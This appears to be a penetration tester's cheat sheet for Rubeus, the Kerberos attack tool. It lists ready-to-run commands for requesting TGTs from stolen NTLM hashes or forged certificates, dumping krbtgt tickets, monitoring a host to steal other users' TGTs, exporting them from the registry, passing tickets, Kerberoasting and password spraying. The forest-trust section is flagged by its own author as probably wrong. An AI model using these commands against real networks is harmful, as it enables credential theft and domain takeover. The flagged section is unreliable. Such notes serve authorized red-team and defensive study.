Rubeus.exe
Rubeus is wonderful for playing with hashes and Kerberos tickets.
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrapTIP
Note: if doing asktgt for a machine account, be sure to use the trailing dollar sign, i.e. DC01$
Request a TGT with a pfx file (ESC1)
You'd do this, for example, after abusing ESC1 or ESC8 with certify.exe.
Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /pttRequest a TGT with a pfx file (ESC8)
certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIERRequest a TGT when abusing forest trusts [ UNDER REVIEW ]
DANGER
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrapDump tickets on a local machine
rubeus.exe dump /service:krbtgt /nowrapMonitor mode on a local machine
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITORMonitor mode - save to disk
If for some reason the TGTs won't write to registry, try this to write to disk:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log"Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them:
reg export HKLM\SOFTWARE\MONITOR backup1.reg TIP
Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.
Describe a ticket
rubeus.exe describe /ticket:base64ticketThis came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it and was getting all sorts of errors. When I ran the describe command the output said KeyType=180 which I learned means credential guard is in place and that ticket won't work anywhere else but the box it came from!
Pass-the-ticket
rubeus.exe ptt /ticket:xxxKerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txtPassword spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txtPassword spraying (with passwords file)
It's the same command above, except instead of /password:SomePassword you do:
/passwords:file-full-of-passwords.txt